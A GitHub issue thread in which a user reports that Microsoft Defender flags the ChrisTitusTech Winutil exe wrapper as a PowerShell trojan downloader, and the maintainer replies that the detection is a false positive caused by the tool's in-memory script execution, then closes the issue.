ChrisTitusTech
Exe wrapper from christitustech.com is flagged by MS Defender for TrojanDownloader:PowerShell/Ploprolo.gen!A
Hello,
I downloaded the exe wrapper from christitustech.com to show my support for the utility. Upon downloading the zip, MS Defender flagged the file for the following reason "TrojanDownloader:PowerShell/Ploprolo.gen!A" I'm not knowledgeable enough to understand whether this is a false flag or not, but it's not the most confidence inspiring when downloading software you just paid to show your support for.
Found the same issue referenced here: https://github.com/ChrisTitusTech/website/issues/84 by wolferrine on Jan 21.
Microsoft provided the additional documentation/help link here: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanDownloader%3APowerShell%2FPloprolo.gen!A&threatid=2147719730
Would be good to hear back or get some official response to this for less experienced users of the utility.
Thanks!
I also ran the zip through virustotal.com and got the following results if that's of any use:
This issue was marked as stale because it has been inactive for 7 days
![github-actions[bot] avatar](https://avatars.githubusercontent.com/in/15368?v=4 "Published by a pub.dev verified publisher"){kind=small}
Winutil gets flagged by some security vendors as malware off and on because it contains scripts that modify Windows and also because of the nature of downloading invoking and running the script in memory. Which looks similar to some multi stage malware attacks. This is a False Positive /close
